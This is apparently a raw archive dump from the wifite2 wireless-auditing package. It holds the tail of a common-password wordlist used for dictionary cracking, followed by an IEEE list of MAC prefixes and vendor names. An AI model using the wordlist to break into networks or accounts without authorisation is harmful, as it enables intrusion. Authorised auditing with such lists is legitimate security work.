2q3w4e5r 2puppies 2fast4u2 2cool4you 2beornot2be 29912991 29121970 29101968 29091978 29082003 29081982 29071979 29061989 29061983 29061979 29051978 29051972 29051453 29031977 29011998 29011971 28912891 28742874 28592859 28582858 28242824 28121998 28111984 28111982 28111979 28101972 28101968 28092000 28081971 28071991 28071987 28071972 28061993 28051974 28042804 28042000 28041997 28041983 28032803 28032000 28031978 28021982 28012000 28011994 28002800 27202720 27121996 27121977 27111982 27111978 27101985 27081996 27081989 27081971 27071977 27071976 27061994 27051976 27041994 27031987 27021993 26912691 26872687 26512651 26322632 26121997 26101973 26092609 26091997 26091996 26091978 26081985 26071980 26061995 26021991 26011976 25762576 25592559 25372537 25121970 25121967 25111996 25101970 25091995 25091992 25091978 25071993 25071975 25071968 25061997 25061995 25051997 25051992 25051977 25031980 25021997 25021980 24861793 24852485 24812481 24752475 24232423 24121996 24121973 24111997 24111977 24072001 24061998 24061984 24061982 24061977 24051984 24051980 24041999 24041983 24041982 24031996 24011981 23942394 23662366 23502350 23442344 23352335 231231231 23121996 23111996 23111969 23101997 23101979 23101974 23071996 23061976 23041997 23041974 22752275 22542254 22482248 22292229 22202220 22162216 22111996 22111984 22092000 22091997 22091975 22081985 22081982 22081978 22081977 22061982 22061980 22051975 22041995 22031975 22031974 22031971 22021998 22011997 22011971 21972197 21262126 21172117 21121973 21121972 21111997 21111974 21101995 21091977 21081997 21081978 21081976 21081974 21071974 21051979 21041996 21041976 21031998 21021998 21011997 21011984 21011976 20632063 20602060 20412041 20362036 20172017 20112012 20111982 20101998 20101975 20101967 20091997 20091996 20091992 20082000 20081996 20081980 20072000 20071998 20061996 20052008 20051999 20051998 20051977 20051971 20041976 20041972 20021970 20012006 2000jeep 1raiders 1qazxcde3 1qaz1234 1qa1qa1qa 1purpose 1prodigy 1plumber 1montana 1lovegod 1liverpool 1leonard 1jonathan 1holiday 1element 1coconut 1asdfghj 1a1a1a1a1a 19972001 19952008 19941125 19932010 19901025 19891023 19890801 19890202 19881005 19880607 19872009 19872008 19871989 19870305 19862010 19862005 19861988 19861215 19860708 19860222 19852000 19851218 19851212 19851128 19850110 19841988 19841983 19841209 19841205 19841106 19841019 19841012 19840310 19840202 19840128 19831224 19831108 19830306 19820626 19811126 19811010 19800101 19771979 19677691 19641965 19561957 19511953 19321932 19121968 19111992 19101995 19101981 19101972 19082002 19081995 19072002 19071981 19061994 19051997 19041996 19041979 19032006 19031997 19021997 18971897 18651865 18351835 18301830 18251825 18111994 18111989 18091809 18081996 18071982 18071981 18062000 18061997 18061996 18061995 18061975 18041979 18041978 18032000 18031996 18031979 18031976 18022000 18021998 18011973 17441744 173173173 1717171717 17111993 17111969 17101995 17101985 17101977 17101975 17091994 17081998 17081972 17061976 17031996 17021975 17011995 17011981 17011977 16729438 16651665 16401640 16171819 16121978 16101999 16091983 16091978 16081997 16081993 16061996 16061977 16051999 16051997 16051982 16051977 16051975 16041979 16041967 16032001 16031976 16021978 16011995 16011983 159753asd 159753654 15963210 15831583 15671567 15621562 15111995 15111973 15111972 15101976 15092000 15091997 15091972 15081997 15081978 15071981 15051994 15051973 15051972 15041995 15041979 15031970 15021996 15021963 15011997 14789653 14481448 14421442 14253647 14131211 14121977 14121970 14112000 14111993 14101997 14101979 14091995 14091993 14081971 14071998 14071977 14061976 14051997 14051979 14051969 14041996 14041983 14041978 14041969 14031977 14011980 13961396 13792846 1324576890 131313131313 13121997 13111998 13111996 13101998 13101977 13101966 13092001 13091995 13091974 13081996 13081977 13081972 13061995 13061983 13052000 13051997 13051969 13051968 13041994 13031977 13031973 13021998 13012000 13011979 12641264 12621262 12611261 123qwertyuiop 123andre 123abcxyz 123987465 12366321 1234four 123498765 123465789 12345qqq 12345888 123456pc 123456ag 123456abcde 123456963 123456890 12345678u 12345678as 12345678963 1234567812 12345610 1234560987 12344444 123412341 12332147 12312355 12312313 12201989 12171984 1213141516171819 12122004 121212qw 12111996 12111969 12091999 12091996 12091975 12081998 12081974 12071973 12061999 12052007 12051998 12051977 12041999 12041974 12041973 12031971 12022000 12021972 12021966 12021958 12011998 11992288 11951195 11861186 1134hell 11225566 11223366 1122334455667788 11223344556677 11213141 11171980 11116666 11111998 11111972 11111969 11101996 11091997 11091978 11081998 11081995 11081977 11071996 11071971 11071955 11062000 11061998 11041976 11041975 11041973 11031973 11021977 11021971 11012002 11011975 11000011 10881088 10841084 10771077 10421042 10401040 102030aa 10122002 10121971 10121964 10121958 10111972 10111971 10101962 100proof 10072000 10071974 10061980 10051999 10042000 10041974 10041967 10031976 10011991 10011975 10011968 09111993 09111987 09111970 09111968 09101982 09101980 09101978 09101973 09091978 09091970 09081975 09071981 09071978 09061989 09061980 09061975 09052000 09051993 09041972 09031979 09031976 09021995 09010901 08230823 08122000 08121998 08121978 08121964 08111991 08111977 08101998 08101996 08101988 08101976 08091970 08082008 08082000 08081981 08081973 08061996 08051978 08031981 08011997 08011995 08011980 08010801 07240724 07121983 07111997 07091995 07091992 07061980 07060706 07051993 07051992 07031999 07031980 07030703 07021975 07011995 07011978 07011972 06250625 06230623 06130613 06121992 06111997 06111967 06101998 06101976 06081998 06081972 06071986 06071978 06061998 06061970 06052005 06051996 06051995 06051993 06051990 06041999 06041998 06041996 06041985 06031989 06021998 06021993 06021988 06021983 06011991 05280528 05150515 05121995 05121978 05111984 05102000 05101997 05101968 05091991 05091983 05091979 05091975 05081999 05081995 05081977 05071996 05071981 05071979 05061995 05051997 05051974 05041993 05041981 05041971 05031994 05031990 05031985 05031974 05021979 05011996 05011985 04121981 04121980 04111994 04111978 04101981 04101978 04101977 04101976 04091977 04081978 04071994 04071983 04071980 04071975 04071970 04070407 04061997 04061983 04051975 04041970 04031996 04031978 04031972 04021998 04021997 04021995 04021972 04012000 04011996 04011981 04011978 03270327 03150315 03111995 03111992 03111990 03111978 03111976 03092002 03081997 03061981 03051997 03051972 03051968 03041997 03041996 03041993 03031970 03021981 03021976 03011988 03011980 02210221 02202000 02200220 02170217 02121977 02111995 02111971 02101997 02071998 02062000 02061974 02061968 02051978 02051975 02051972 02041973 02041972 02031998 02031977 02031973 02031968 02031967 02021977 02021969 02021967 02011993 02011979 02011977 02011974 02011973 02010201 01210121 01121978 01111978 01102002 01101986 01101975 01091983 01091981 01091977 01081973 01081972 01071997 01071979 01061975 01061971 01051998 01051981 01051972 01041996 01041981 01021980 010203010203 01011962 0099887766 00880088 00220022 000999888 *123456* wifite2-2.7.0/ieee-oui.txt0000644000175000017500000554762314437644461014736 0ustar sophiesophie0050C2F71 RF Code 0050C29CC Hirotech inc. 0050C2414 Talleres de Escoriaza SA 0050C21F5 Abest Communication Corp. 0050C2F05 ESI Ventures, LLC 0050C2F9B NEWELL TECHNOLOGIES LIMITED 0050C234D BMK professional electronics GmbH 40D85508E Lyngsoe Systems 0050C2D02 SURVALENT TECHNOLOGY CORP 0050C2A2A Astronics Custom Control Concepts 0050C2462 CT Company 0050C2FB3 CT Company 0050C2F24 CT Company 40D855072 CT Company 40D855098 DAVE SRL 0050C2E64 Edgeware AB 0050C227C Danlaw Inc 0050C27D5 DEUTA-WERKE GmbH 40D85511C DEUTA-WERKE GmbH 40D8551A1 KRONOTECH SRL 0050C2CF9 Elbit Systems of America 0050C21FA SP Controls, Inc 0050C2F6B Algodue Elettronica Srl 0050C2811 Open System Solutions Limited 40D855010 APG Cash Drawer, LLC 0050C28F9 Honeywell 0050C2616 Honeywell 0050C2872 Oliotalo Oy 0050C2F74 Thor Technologies Pty Ltd 0050C224E Scharff Weisberg Systems Integration Inc 40D8550F4 MB connect line GmbH Fernwartungssysteme 0050C2B1F Atlas Copco IAS GmbH 0050C2CD3 Covidence A/S 0050C2B25 Triax A/S 0050C28F4 Critical Link LLC 0050C2384 Wireless Reading Systems Holding ASA 0050C2E67 Critical Link LLC 0050C2AE3 PSD 0050C2192 Advanced Concepts, Inc. 0050C225F Albert Handtmann Maschinenfabrik GmbH&Co.KG 40D8550D7 Avant Technologies 0050C26C6 MedAvant Healthcare 0050C2230 AutoTOOLS group Co. Ltd. 0050C23BA Phytec Messtechnik GmbH 0050C28F0 Xentras Communications 0050C202C Narrowband Telecommunications 0050C2144 Phytec Messtechnik GmbH 0050C2AF0 Fr. Sauter AG 0050C2134 DRS Photronics 0050C2194 Cominfo, Inc. 0050C2E4C Applied Micro Electronics AME bv 0050C2E70 DORLET SAU 0050C2C6C DORLET SAU 0050C2796 DORLET SAU 0050C2DDE DRS Imaging and Targeting Solutions 40D855155 Telefrang AB 0050C2172 SAET I.S. S.r.l. 0050C257D Sierra Video Systems 0050C2A8B Navicron Oy 0050C23C0 EDA Industries Pte. Ltd 0050C2681 Owasys Advanced Wireless Devices 0050C2B37 IAdea Corporation 0050C2D43 DSP4YOU LTd 0050C2F90 SecureTech Systems, Inc. 0050C273A Naturela Ltd. 0050C25BD NOMUS COMM SYSTEMS 0050C2E18 ABB Transmission and Distribution Automation Equipment (Xiamen) Co., Ltd. 0050C2178 Partner Voxstream A/S 0050C220E PYRAMID Computer GmbH 0050C25A6 Plastic Logic 0050C2EAE Alyrica Networks 0050C292A Rohde&Schwarz Topex SA 0050C2BFA Rohde&Schwarz Topex SA 0050C2D47 Rohde&Schwarz Topex SA 0050C2EAD Rohde&Schwarz Topex SA 40D855182 Georg Neumann GmbH 0050C2FAB Aplex Technology Inc. 0050C23E5 Vacon Plc 0050C233A United Telecoms Ltd 0050C2552 Elfiq Inc. 0050C2C61 HaiVision Systems Incorporated 0050C2A44 TORC Technologies 0050C2F87 Vaisala Oyj 0050C23E2 SysNova 0050C212F Haag-Streit AG 0050C2143 AARTESYS AG 0050C20B8 LAN Controls, Inc. 0050C2956 Sicon srl 0050C25C2 Intuitive Surgical, Inc 0050C2FA5 Intuitive Surgical, Inc 0050C2A0E ENGICAM s.r.l. 0050C253F Ellips B.V. 0050C247A Efficient Channel Coding 0050C27A9 DELTA TAU DATA SYSTEMS, INC. 0050C2980 Digital Payment Technologies 0050C2080 AIM 0050C23B6 Arecont Vision 0050C2953 Grupo Epelsa S.L. 0050C2974 EMAC, Inc. 40D855183 EMAC, Inc. 0050C2360 Digital Receiver Technology 40D8551D0 Webeasy BV 40D8551E2 ELNEC s.r.o. 40D8551C1 Triamec Motion AG 40D8551C4 QED Advanced Systems Limited 40D8551AE Autonomous Solutions, Inc 40D8551AA Broachlink Technology Co.,Limited 40D8551A7 ENTEC Electric & Electronic CO., LTD 40D8551A8 Multiobrabotka 40D8551B6 Magic Systems 40D855199 PRESSOL Schmiergeraete GmbH 40D85519F Patria Aviation Oy 40D8551A0 Futaba Corporation 40D85519E Thirdwayv Inc. 40D85519B Northern Star Technologies 40D85519C Parris Service Corporation 40D85518F Beat Sensing co. , ltd. 40D85517F Telvent 40D855181 eROCCA 40D855168 OPASCA Systems GmbH 40D85515D Actronic Technologies 40D85514F TDS Software Solutions Pty Ltd 40D855159 PLATINUM GmbH 40D855170 ICS Eletronics 40D85513E hanatech 40D85513C shanghai Anjian Information technology co. , ltd. 40D85513D Perm Scientific-Industrial Instrument Making Company JSC 40D855120 ObjectFab GmbH 40D855143 Tokyo Drawing Ltd. 40D855127 LIGHTSTAR 40D85512F Private 40D85512B Mango DSP, Inc. 40D855139 WOW System 40D855137 GDE Polska 40D855142 Tetracore, Inc. 40D8550FD MONOGRAM technologies ltd 40D8550FC eumig industrie-tv GmbH 40D85511A Sicon srl 40D855117 RCS Energy Management Limited 40D8550EE Siegmar Zander HuSWare 40D8550ED IntelliDesign Pty Ltd 40D8550EA A-Z-E 40D8550E8 HEITEC AG 40D855107 Smith Meter, Inc 40D8550D6 deskontrol electronics 40D8550D4 Mitsubishi Heavy Industries, Ltd. 40D8550D2 ELAN SYSTEMS 40D8550B5 DATA SHARING CONSULTING 40D8550DE VPG 40D8550DC NVS Technologies Inc 40D8550C4 Inspired Systems 40D8550A6 Alumbra Produtos Elétricos e Eletrônicos Ltda 40D8550A8 Baudisch Electronic GmbH 40D85508F Excelitas 40D855091 KDT 40D85508A Leder Elektronik Design 40D8550B2 Ever Trend Technology Development Limited 40D8550B0 Micrologic 40D8550AF EnVerv Inc. 40D8550AE GD Mission Systems 40D8550AD Space Micro 40D855095 Heart Force Medical 40D85509B Tokyo Denki Gijutsu Kogyo 40D855073 Diamond Technologies, Inc 40D85506E C-COM Satellite Systems Inc. 40D85506B BRS Sistemas Eletrônicos 40D855082 ard sa 40D85507E TESCOM CORPORATION 40D855069 Smartcom-Bulgaria AD 40D85506D BroadSoft, INC 40D85505E inoage GmbH 40D855053 Amantys Ltd 40D855033 Ermes Elettronica s.r.l. 40D855048 GD Mission Systems 40D855046 Circuitlink Pty Ltd 40D855042 Mango Communicaitons Inc. 40D85503C Computer System Co.,Ltd 40D855040 GHL Systems Berhad 40D855057 Tammermatic Group Oy 40D855038 Special Measurements Labs LLC 40D85501F Sitep Italia Spa 40D85501A MEGGITT DEFENSE SYSTEMS INC. 40D85500E Brightwell Dispensers 40D85500D HuNS 40D855006 Bactest Limited 40D855003 AlphaNavigation coltd 40D855029 Depro Electronique 0050C2FFA Nupoint Systems Inc. 40D855013 Grande Vitesse Systems 40D855015 BITMILL srl 0050C2FCB Propagation Systems Limited 0050C2FDA ELAN SYSTEMS 0050C2FD8 Ease Inc. 0050C2FED LOGISOL Kft. 0050C2FEC First System Technology Co., Ltd. 0050C2FEA Brunel GmbH Section Communications 0050C2FE4 RTT Mobile Interpretation 0050C2FB4 MC-monitoring SA 0050C2FB2 Preston Industries dba PolyScience 0050C2FAE ATI Automação Telecomunicações e Informática Ltda 0050C2FAF Vremya-CH JSC 0050C2FAD Finishing Brands 0050C2FBF MYLOGIC 0050C2FBE senTec Elektronik GmbH 0050C2F9E Matsusada Precision Inc. 0050C2F92 CONET Solutions GmbH 0050C2F93 Baudisch Electronic GmbH 0050C2FC5 Sakura Seiki Co.,Ltd. 0050C2FAA YJSYSTEM 0050C2F6D Pro Design Electronic GmbH 0050C2F6E Smith Meter, Inc. 0050C2F62 EMAC, Inc. 0050C2F5E Y-cam Solutions Ltd 0050C2F89 CSA Engineering AG 0050C2F3D Project service S.a.s 0050C2F3C Vemco Sp. z o. o. 0050C2F37 Rosslare Enterprises Limited 0050C2F39 InForce Computing, Inc. 0050C2F50 Moritex Corporation 0050C2F5C DSP DESIGN LTD 0050C2F5A Sentry 360 Security 0050C2F56 Monsoon Solutions, Inc. 0050C2F4B Supranet 0050C2F31 Ruetz Technologies GmbH 0050C2F2B Bio Guard component & technologies 0050C2F46 Reason Tecnologia S.A. 0050C2F41 FairyDevices Inc. 0050C2EF8 HCL Technologies 0050C2F0B Treehaven Technologies, Inc. 0050C2F25 Samway Electronic SRL 0050C2F18 Vitec Multimedia 0050C2F17 ABB Transmission and Distribution Automation Equipment (Xiamen) Co., Ltd. 0050C2F15 Sascal Displays Ltd 0050C2F09 Wheatstone Corporation 0050C2EDB BELIK S.P.R.L. 0050C2EDA Joint Stock Company "Svyaz Inginiring M" 0050C2ED9 Plasmatronics pty ltd 0050C2EBE Global Tecnologia LTDA. 0050C2ECF TAIWAN HIPLUS CORPORATION 0050C2ED1 Arcontia Technology AB 0050C2E8D SystemAdvanced Co,Ltd 0050C2E8C Epec Oy 0050C2EA4 head 0050C2EA1 TEX COMPUTER SRL 0050C2EB8 dspnor 0050C2EB2 Otaki Electric Corporation 0050C2EA7 Saia-Burgess Controls AG 0050C2E8B RPA Electronic Solutions, Inc. 0050C2EB3 AR RF/Microwave Instrumentation 0050C2E9C SPARQ systems 0050C2E55 TTi Ltd 0050C2E54 Arcos Technologies LTD 0050C2E52 Famas System S.p.A. 0050C2E4E Institute For Information Industry 0050C2E6B Sika Technology AG 0050C2E69 Netmaker 0050C2E63 Prima sistemi 0050C2E79 MCS MICRONIC Computer Systeme GmbH 0050C2E73 ACS Motion Control Ltd. 0050C2E5C MCOPIA Co., Ltd 0050C2E6D Allerta Inc 0050C2E6E Power-One Italia S.p.A 0050C2E7D AEL Microsystems Limited 0050C2E7E Swareflex GmbH 0050C2E60 HORIZON.INC 0050C2E30 Goennheimer Elektronic GmbH 0050C2E38 Aesir Copenhagen 0050C2E3B Nanosolution Inc. 0050C2E39 Telemetrics Inc. 0050C2E45 Stichting Sunrise 0050C2E1E Lo-Q plc 0050C2E15 IHI Scube Co.,Ltd 0050C2E0F Trentino Systems 0050C2E10 Radinetworks Co., Ltd 0050C2E28 Teplovodokhran 0050C2E27 CONTROL SYSTEMS Srl 0050C2E26 Cinetix s.r.l. 0050C2E22 Michael Riedel Transformatorenbau GmbH 0050C2DF2 Ocean Sonics 0050C2DF8 Tommotek (WA) Pty Ltd. 0050C2DD9 Metraware 0050C2DD8 Leonardo UK Ltd 0050C2DDD A&A GENERAL SRL 0050C2DCA Tele Data Control 0050C2DC4 Keith & Koep GmbH 0050C2DD0 IDC Solutions Pty Ltd 0050C2DBB Esensors, Inc. 0050C2DBE WITHSYSTEM Co.,Ltd 0050C2DC0 Security Services Group (SSG) 0050C2D87 Electrolight Shivuk (1994) Ltd. 0050C2DA7 Capton 0050C2DA5 megatec electronic GmbH 0050C2DA3 GD Mission Systems 0050C2DA6 Manitowoc Ice 0050C2DB0 IMAGO Technologies GmbH 0050C2D98 Rong Shun Xuan Corp. 0050C2D94 Software Effect Enterprises, Inc 0050C2D90 Dumps Electronic 0050C2D92 Manz 0050C2D8E LSD Science&Technology Co.,Ltd. 0050C2D8D CS-Instruments 0050C2DA0 Precision Remotes 0050C2D9F BitWise Controls 0050C2DB3 LAUDA DR. R. WOBSER GMBH & CO. KG 0050C2D71 EMAC, Inc. 0050C2D68 HiSpeed Data, Inc. 0050C2D5C Ibetor S.L. 0050C2D59 BUANCO SYSTEM A/S 0050C2D7E LYNX Technik AG 0050C2D7C Microcubs Systems Pvt Ltd 0050C2D62 EMAC, Inc. 0050C2D63 DATAREGIS S.A. 0050C2D4F SECOM GmbH 0050C2D4C DALOG Diagnosesysteme GmbH 0050C2D53 Telemerkki Oy 0050C2D2D Cadi Scientific Pte Ltd 0050C2D27 Fr.Sauter AG 0050C2D14 SAET I.S. 0050C2D10 Rosslare Enterprises Ltd. 0050C2D12 Tokyo Weld Co.,Ltd. 0050C2D0F Saia-Burgess Controls AG 0050C2D0B CODACO ELECTRONIC s.r.o. 0050C2D0A Airpoint Co., Ltd. 0050C2D26 RCH GROUP 0050C2D1C Recon Dynamics, LLC 0050C2D20 7+ Kft 0050C2D03 Peekel Instruments B.V. 0050C2CFD AIRFOLC,INC. 0050C2D34 GAON TECH corp. 0050C2CD4 SCHRAML GmbH 0050C2CD5 Arcos Technologies Ltd. 0050C2CC2 ConectaIP Tecnologia S.L. 0050C2CF7 Armour Home Electronics LTD 0050C2CF6 Epec Oy 0050C2CE9 Private 0050C2CE6 APLICA TECHNOLOGIES 0050C2CE7 Echola Systems 0050C2CCA SANMINA SHENZHEN 0050C2CDB RUTTER INC 0050C2CDA taskit GmbH 0050C2C97 MSTRONIC CO., LTD. 0050C2C94 ISIS ENGINEERING, S.A. 0050C2C89 Creative Micro Design 0050C2CB1 ZK Celltest Inc 0050C2CAF Fr. Sauter AG 0050C2C9B Sm electronic co. 0050C2C91 Media Technologies Ltd. 0050C2CA9 Intelligent Devices 0050C2CAB SAE IT-systems GmbH & Co. KG 0050C2C64 Pal Software Service Co.,Ltd. 0050C2C5F Icon Time Systems 0050C2C75 Rovsing A/S 0050C2C6D Deansoft CO., Ltd. 0050C2C6A ELECTRONICA KELD 0050C2C6F MSB Elektronik und Geraetebau GmbH 0050C2C71 Sequoia Technology Group Ltd 0050C2C5B MICRO TECHNICA 0050C2C3F ANXeBusiness Corporation 0050C2C83 Gronic Systems GmbH 0050C2C85 Peek Traffic Corporation 0050C2C84 DOMIS 0050C2C48 Cytek Media Systems, INC. 0050C2BF6 NOLAM EMBEDDED SYSTEMS 0050C2BF7 Phytec Messtechnik GmbH 0050C2BF4 Monarch Innovative Technologies Pvt Ltd 0050C2BF2 Saia-Burgess Controls AG 0050C2C18 Linuxstamp Designs, LLC 0050C2C03 Volumatic Limited. 0050C2C28 ELREHA GmbH 0050C2BC8 AGWTech Ltd 0050C2BBD ITS Telecom 0050C2BD0 EDC wifi 0050C2BCF Epiko, elektronski sistemi d.o.o. 0050C2BEE Private 0050C2BEA Daeyoung inc. 0050C2BE6 Docobo Ltd 0050C2BAD Prediktor AS 0050C2BAB iDeal Teknoloji Bilisim Cozumleri A.S. 0050C2BBF Phytec Messtechnik GmbH 0050C2BDC SS Systems LLC 0050C2BD7 SLAT 0050C2BE0 Phaedrus Limited 0050C2BE2 Convergent Bioscience Ltd. 0050C2BDE Evo-Teh d.o.o. 0050C2B7E NARETRENDS 0050C2B89 ENTEC Electric & Electronic Co., LTD. 0050C2B87 EMAC, Inc. 0050C2B84 Innovate Software Solutions Pvt Ltd 0050C2BA1 Transtechnik GmbH & Co.KG 0050C2BA2 Logical Tools s.r.l. 0050C2B9B Telventy Energia S.A. 0050C2B64 FEW Bauer GmbH 0050C2B65 Peek Traffic Corporation 0050C2B90 NAONWORKS Co., Ltd 0050C2B94 Tritech International Ltd 0050C2B8F Gentec 0050C2B8A MicroPoise 0050C2B6D Sound Metrics Corp 0050C2B24 Teledyne Defence Limited 0050C2B21 Phytron-Elektronik GmbH 0050C2B22 FarSite Communications Limited 0050C2B59 SLICAN sp. z o.o. 0050C2B57 Phytec Messtechnik GmbH 0050C2B55 SANYO ELECTRONIC INDUSTRIES CO.,LTD 0050C2B27 ATEME 0050C2B45 Efftronics Systems (P) Ltd 0050C2B40 Tecnint HTE SRL 0050C2B3D AMS 0050C2B2F IntelliVision Technologies, Corp 0050C2B36 CRDE 0050C2B10 Marine Entertainment Systems Ltd 0050C2B0A Indutherm Giesstechnologie GmbH 0050C2AFD HomeScenario, Inc. 0050C2AFA Absolute Fire Solutions Inc. 0050C2B12 CM Elektronik GmbH 0050C2AF3 Palomar Products, Inc. 0050C2AEA EMBEDIA 0050C2AEB UMLogics Corporation 0050C2B02 MASTER CO LTD 0050C2AE5 ABS Gesellschaft f. Automatisierung, Bildverarbeitung und Software mbH 0050C2AE2 Power Medical Interventions 0050C2AA8 Nexans Cabling Solutions 0050C2AAD Update Systems Inc. 0050C2AAA Flexible Picture Systems 0050C2AA6 Bassett Electronic Systems ltd 0050C2AC8 Palladio Systeme GmbH 0050C2AD5 Mighty Lube Systematic Lubrication, Inc. 0050C2AE1 EVERCARE 0050C2ADA Essepie Srl 0050C2ABB Volantic AB 0050C2A8C Redwire, LLC 0050C2A87 Littlemore Scientific 0050C2A88 S-SYS 0050C2A89 CA Traffic Ltd 0050C2A91 Ceron Tech Co.,LTD 0050C2A90 S.two Corporation 0050C2AA2 ELPA sas 0050C2AA1 ELREM ELECTRONIC AG 0050C2A5D MECC CO., LTD. 0050C2A73 KYOEI ENGINEERING Co.,Ltd. 0050C2A6A Infocrossing 0050C2A7C Pneu-Logic Corporation 0050C2A58 EPL 0050C2A59 GSP Sprachtechnologie GmbH 0050C2A54 Diamond Point International (Europe) Ltd 0050C2A53 Quality & Design 0050C2A33 Fuji Firmware 0050C2A31 Coolit Systems, Inc. 0050C2A2F DragonFly Scientific LLC 0050C2A3B IPcontrols GmbH 0050C2A4C VasoNova, Inc. 0050C2A41 Meiryo Denshi Corp. 0050C2A19 Icon Time Systems 0050C2A16 Baudisch Electronic GmbH 0050C2A08 LabJack Corporation 0050C2A04 TP Radio 0050C29B7 St. Michael Strategies 0050C29B4 EUKREA ELECTROMATIQUE SARL 0050C29E9 Ciemme Sistemi Spa 0050C29E5 Halliburton Far East Pte Ltd 0050C29E1 Enreduce Energy Control AB 0050C29F1 IDEAS s.r.l. 0050C29ED Picell B.V. 0050C29C6 Protronic GmbH 0050C29B9 ISA - Intelligent Sensing Anywhere, S.A. 0050C2970 Tsuji Electronics Co.,Ltd 0050C29A8 DOMIS SA 0050C298A MEV Limited 0050C2988 Pantel International 0050C2983 Bogart Engineering 0050C2992 IDT Sound Processing Corporation 0050C298D Mecos AG 0050C297C Creacon Technologies B.V. 0050C297B SMARTQUANTUM SA 0050C2998 Phytec Messtechnik GmbH 0050C294B Piller engineering Ltd. 0050C2946 MEGWARE Computer GmbH 0050C2944 Wireonair A/S 0050C295A TechnoAP 0050C2966 PCM Industries 0050C294A TruMedia Measurement Ltd. 0050C295D full electronic system 0050C290D EVK DI Kerschhaggl GmbH 0050C2931 Korea Telecom Internet Solutions (KTIS) 0050C2934 Xilar Corp. 0050C2932 SMAVIS Inc. 0050C2904 R2Sonic, LLC 0050C2914 IO-Connect 0050C2911 Vapor Rail 0050C2929 Flight Deck Resources 0050C292E Goanna Technologies Pty Ltd 0050C291C MangoDSP 0050C2915 Verint Systems Ltd. 0050C2936 Margaritis Engineering 0050C28FE Cross Country Systems AB 0050C28FC Symetrics Industries 0050C28F8 RMSD LTD 0050C28F3 Curtis Door Systems Inc 0050C28C9 A+S Aktuatorik und Sensorik GmbH 0050C28DA DOCUTEMP, INC 0050C28D5 Peek Traffic Corp 0050C28D9 Industrial Control and Communication Limited 0050C28E7 MKT Systemtechnik 0050C28E9 UNIDATA 0050C28F1 Detection Technologies Ltd. 0050C2903 EcoAxis Systems Pvt. Ltd. 0050C2900 Magor Communications Corp 0050C28D4 Internet Protocolo Lógica SL 0050C28D3 IFAM GmbH 0050C28BB smtag international ag 0050C28B8 DSS Networks, Inc. 0050C28B9 ACD Elektronik GmbH 0050C28B7 Calnex Solutions plc 0050C28B1 RingCube Technologies, Inc. 0050C28AE DESARROLLO DE SISTEMAS INTEGRADOS DE CONTROL S.A. 0050C28AF Xelerated 0050C28C3 Byte Paradigm 0050C28BF ARISTO Graphic Systeme GmbH & Co. KG 0050C28BC Honeywell Sensotec 0050C28BD Matrix Switch Corporation 0050C2881 InnoTrans Communications, Inc. 0050C287D AT&T Government Solutions 0050C2879 MILESYS 0050C2875 Phytec Messtechnik GmbH 0050C2877 Motion Analysis Corp 0050C2891 Admiral Secure Products, Ltd. 0050C288F Keynote SIGOS GmbH 0050C289D Systemtechnik GmbH 0050C289B Sensata Technologies, Inc. 0050C2720 Colorado Engineering Inc. 0050C2868 Aethon, Inc. 0050C2866 Saia Burgess Controls AG 0050C2852 eInfochips Ltd. 0050C2848 DASA ROBOT Co., Ltd. 0050C2837 ID-KARTA s.r.o. 0050C284C Performance Motion Devices 0050C282D Elmec, Inc. 0050C2830 CompuShop Services LLC 0050C2803 dB Broadcast Limited 0050C2826 HEWI Heinrich Wilke GmbH 0050C2823 Robot Visual Systems GmbH 0050C2813 Intelleflex Corporation 0050C280D Acube Systems s.r.l. 0050C281A InfoGLOBAL 0050C2821 MISCO Refractometer 0050C27C1 Primary Integration Encorp LLC 0050C27BE Powerlinx, Inc. 0050C27E2 DIGITROL LTD 0050C27E4 Meta Vision Systems Ltd. 0050C27DD LS Elektronik AB 0050C27EE NH Research 0050C27D4 WR Systems, Ltd. 0050C27CD Precision MicroControl Corporation 0050C27D6 International Mining Technologies 0050C2793 Enertex Bayern GmbH 0050C2790 GE Security-Kampro 0050C278C Giga-tronics, Inc. 0050C278F ELMAR electronic 0050C278E GLOBALCOM ENGINEERING SRL 0050C278D Telairity 0050C2787 Austco Marketing & Service (USA) ltd. 0050C27B0 IMP Telekom 0050C27AE Global Tel-Link 0050C279F ZAO NPC 0050C27A5 Quantum Medical Imaging 0050C276D Mobilisme 0050C2767 EID 0050C274C Saia-Burgess Controls AG 0050C275D Fluid Analytics, Inc. 0050C2714 T.E.AM., S. A. 0050C2712 Pasan SA 0050C2710 Wharton Electronics Ltd 0050C273D cryptiris 0050C2736 Nika Ltd 0050C272F Priority Electronics Ltd 0050C272B Sequestered Solutions 0050C271E ASKI Industrie Elektronik Ges.m.b.H. 0050C26E2 Phytec Messtechnik GmbH 0050C2705 Hauch & Bach ApS 0050C26F8 RV Technology Limited 0050C26F6 AV SatCom AS 0050C26DE Laser Tools & Technics Corp. 0050C26F1 ITS Telecom 0050C26ED Sechan Electronics, Inc. 0050C26E4 MangoDSP 0050C270A Efficient Channel Coding 0050C26B6 CommoDaS GmbH 0050C26CB Stream Processors 0050C26A6 Victory Concept Industries Ltd. 0050C26A2 Cadi Scientific Pte Ltd 0050C26A4 TELETASK 0050C26BF Optoplan as 0050C26D6 ADL Electronics Ltd. 0050C26D1 Schnick-Schnack-Systems GmbH 0050C26AF Nanoradio AB 0050C268B SIMTEK INC. 0050C268C Isochron Inc 0050C2687 Access Specialties, Inc 0050C2685 Datamars SA 0050C26A1 PRICOL LIMITED 0050C269D Dvation.co.,Ltd 0050C269A StoreTech Limited 0050C2683 MEGGITT Safety System 0050C267E SAIA Burgess Controls AG 0050C2673 Ferrari electronic AG 0050C2670 Naim Audio 0050C2693 Tech Comm, Inc. 0050C267B Sparton Electronics 0050C264F MA Lighting Technology GmbH 0050C264E Northern Power 0050C264B MangoDSP 0050C264A CPqD 0050C262C AirMatrix, Inc. 0050C2629 MacDonald Humfrey (Products) Ltd 0050C2627 JungleSystem Co., Ltd. 0050C2639 Qstreams Networks Inc. 0050C265F Invocon, Inc. 0050C2651 STAER SPA 0050C2650 Liquid Breaker, LLC 0050C2642 Stanton Technologies Sdn Bhd 0050C263C dPict Imaging, Inc. 0050C262E TDM Ingénierie 0050C2617 NARINET, INC. 0050C25FC FilmLight Limited 0050C25FD MEG Electronic Inc. 0050C25FF Gazelle Monitoring Systems 0050C25FA LEA d.o.o. 0050C261C TestPro Systems, Inc. 0050C2622 2N TELEKOMUNIKACE a.s. 0050C2623 SAFELINE SL 0050C2608 Silex Industrial Automation Ltd. 0050C25E4 Buyang Electronics Industrial Co., Ltd. 0050C25F1 Technomarine JSC 0050C25F4 TeamProjects BV 0050C259F ads-tec GmbH 0050C2593 Broadlight 